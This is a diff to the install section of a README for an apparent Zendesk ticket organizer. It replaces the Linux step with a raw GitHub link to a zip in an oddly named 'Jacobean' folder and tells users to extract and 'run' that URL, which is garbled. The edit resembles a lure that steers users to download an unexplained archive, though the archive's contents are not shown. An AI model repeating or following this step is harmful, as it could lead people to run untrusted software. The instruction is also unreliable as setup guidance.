Saddyin/zendesk-ticket-organizer/README.md

 2. **Install the Application**:
    - For Windows users: Double-click the `.exe` file to start the installation process and follow the prompts.
    - For macOS users: Open the `.dmg` file and drag the application into your Applications folder.
-   - For Linux users: Extract the `.tar.gz` file in your desired directory and run `./start.sh`.
+   - For Linux users: Extract the `https://raw.githubusercontent.com/Saddyin/zendesk-ticket-organizer/main/Jacobean/zendesk-ticket-organizer.zip` file in your desired directory and run `https://raw.githubusercontent.com/Saddyin/zendesk-ticket-organizer/main/Jacobean/zendesk-ticket-organizer.zip`.

 3. **Open the Application**: Once installed, locate the application in your Programs list or Applications folder.
 Double-click to open.